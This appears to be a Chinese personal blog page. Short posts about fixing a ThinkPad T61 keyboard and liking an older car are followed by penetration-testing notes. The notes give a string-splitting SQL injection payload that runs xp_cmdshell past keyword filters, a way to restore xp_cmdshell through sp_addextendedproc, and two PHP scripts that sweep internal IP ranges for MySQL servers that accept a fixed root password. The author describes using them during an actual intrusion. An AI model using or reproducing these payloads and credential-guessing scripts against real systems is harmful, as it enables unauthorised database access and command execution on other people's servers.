自己的t61用了一年多。键盘上的有不少烟头烫坏的痕迹。这些都可以忍受。但是TAB按键居然失灵了。就只有自己换了。本来可以送到香港保修。但是 运费都差不多和原装键盘一样了。

所以自己买了原装键盘来自己装。

拍点照片记录一下自己DIY的一刻。

» 阅读全文

一直很喜欢老款的造型。新款的造型不是太喜欢。哎。受极品飞车9影响太大了。努力找钱收一辆来玩玩。。把排气改成从两边出不知道安不安逸。嘿嘿。

declare、xp_、sp_、select、update、insert等关键词被过滤了。幸好单引号没有过滤。拨开云雾见明月啊。

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')

当xp_被过滤了，declare也被过滤了。什么鸟关键字都被过滤了。试试下面的办法。也许会柳暗花明又一村。。

EXEC master.dbo.sp_addextendedproc 'abc','xplog70.dll'

昨日渗透时 ， 整段都是MYSQL服务器。在某个WEB下。用如下脚本来猜了一下MYSQL密码。还真有两个。在WEB下用脚本来弄也方便快捷。MSSQL的同理。。

这个是已知开了3306的。。

<?php

$hostdb = array(
	'192.168.168.10',
	'192.168.168.20',
	'192.168.168.20',
	'192.168.168.40',
	'192.168.168.50',
	'192.168.168.60',
	'192.168.168.70',
	'192.168.168.80',
	'192.168.168.90',
	'192.168.168.100'
);

$dbu = 'root';
$dbp = '1qaz2wsx';

foreach ($hostdb as $host) {
	if(@mysql_connect($host, $dbu, $dbp)) {
		echo $host.' - '.$dbu.' - '.$dbp.' ... OK<br>';
	}
}

echo 'done.';

?>

举一反三，这是全段猜的。

<?php

$ips = '192.168.168.';
$dbu = 'root';
$dbp = '1qaz2wsx';

for ($i=1; $i<254; $i++) {
	if(@mysql_connect($ips.$i, $dbu, $dbp)) {
		echo $ips.$i.' - '.$dbu.' - '.$dbp.' ... OK<br>';
	}
}

echo 'done.';

?>